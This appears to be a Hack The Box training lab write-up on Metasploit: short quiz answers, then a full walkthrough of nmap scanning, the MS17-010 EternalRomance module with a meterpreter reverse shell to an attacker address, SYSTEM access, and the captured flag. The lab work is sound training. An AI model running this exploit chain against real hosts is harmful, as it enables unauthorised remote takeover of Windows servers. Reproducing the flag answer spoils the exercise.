USING THE METASPLOIT FRAMEWORK

INTRODUCTION TO METASPLOIT

Which version of Metasploit comes equipped with a GUI interface?

metasploit pro

What command do you use to interact with the free version of Metasploit?

msfconsole

MODULES

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

root@htb:~$ sudo nmap -sS -sV -T4 10.129.127.100 -p- -oA targetServices
 PORT      STATE SERVICE      VERSION
 80/tcp    open  http         Microsoft IIS httpd 10.0
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 49670/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

root@htb:~$ sudo nmap -sV -sC -T4 10.129.127.100 -p 80,135,139,445,5985,47001,49664-49670 -oA targetServiceDefaultScripts
 PORT      STATE SERVICE      VERSION
 80/tcp    open  http         Microsoft IIS httpd 10.0
 |_http-title: 10.129.127.100 - /
 | http-methods: 
 |_  Potentially risky methods: TRACE
 |_http-server-header: Microsoft-IIS/10.0
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-title: Not Found
 |_http-server-header: Microsoft-HTTPAPI/2.0
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-title: Not Found
 |_http-server-header: Microsoft-HTTPAPI/2.0
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 49670/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_clock-skew: mean: 2h40m01s, deviation: 4h37m10s, median: 0s
 | smb2-time: 
 |   date: 2025-12-08T15:39:42
 |_  start_date: 2025-12-08T15:29:23
 | smb-os-discovery: 
 |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
 |   Computer name: MSF1-WIN01
 |   NetBIOS computer name: MSF1-WIN01\x00
 |   Workgroup: WORKGROUP\x00
 |_  System time: 2025-12-08T07:39:46-08:00
 | smb-security-mode: 
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required

root@htb:~$ msfconsole
msf6> search eternalromance
 Matching Modules
 ================

    #   Name                                  Disclosure Date  Rank    Check  Description
    -   ----                                  ---------------  ----    -----  -----------
    0   exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
    1     \_ target: Automatic                .                .       .      .
    2     \_ target: PowerShell               .                .       .      .
    3     \_ target: Native upload            .                .       .      .
    4     \_ target: MOF upload               .                .       .      .
    5     \_ AKA: ETERNALSYNERGY              .                .       .      .
    6     \_ AKA: ETERNALROMANCE              .                .       .      .
    7     \_ AKA: ETERNALCHAMPION             .                .       .      .
    8     \_ AKA: ETERNALBLUE                 .                .       .      .

msf6> use 0
 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6> show options
 ...
msf6> set RHOSTS 10.129.127.100 
 RHOSTS => 10.129.127.100
msf6> set LHOST 10.10.15.99
 LHOST => 10.10.15.99
msf6> exploit
 [*] Started reverse TCP handler on 10.10.15.99:4444 
 [*] 10.129.127.100:445 - Target OS: Windows Server 2016 Standard 14393
 [*] 10.129.127.100:445 - Built a write-what-where primitive...
 [+] 10.129.127.100:445 - Overwrite complete... SYSTEM session obtained!
 [*] 10.129.127.100:445 - Selecting PowerShell target
 [*] 10.129.127.100:445 - Executing the payload...
 [+] 10.129.127.100:445 - Service start timed out, OK if running a command or non-service executable...
 [*] Sending stage (177734 bytes) to 10.129.127.100
 [*] Meterpreter session 1 opened (10.10.15.99:4444 -> 10.129.127.100:49671) at 2025-12-08 09:57:26 -0600

(Meterpreter 1)(C:\Windows\system32) > shell
 Process 804 created.
 Channel 1 created.
 Microsoft Windows [Version 10.0.14393]
 (c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> findstr /i /s "flag.txt" c:\*
 C:\Users\Administrator\Desktop\flag.txt��([�����V�Ӕ�E�f������

 * /i - Case-insensitive search.
 * /s - Searches the specified directory and all of its subdirectories.

C:\Windows\system32> type c:\Users\Administrator\Desktop\flag.txt
 HTB{MSF-W1nD0w5-3xPL01t4t10n}

PreviousFOOTPRINTING NextSKILLS ASSESSMENT

Last updated 10 days ago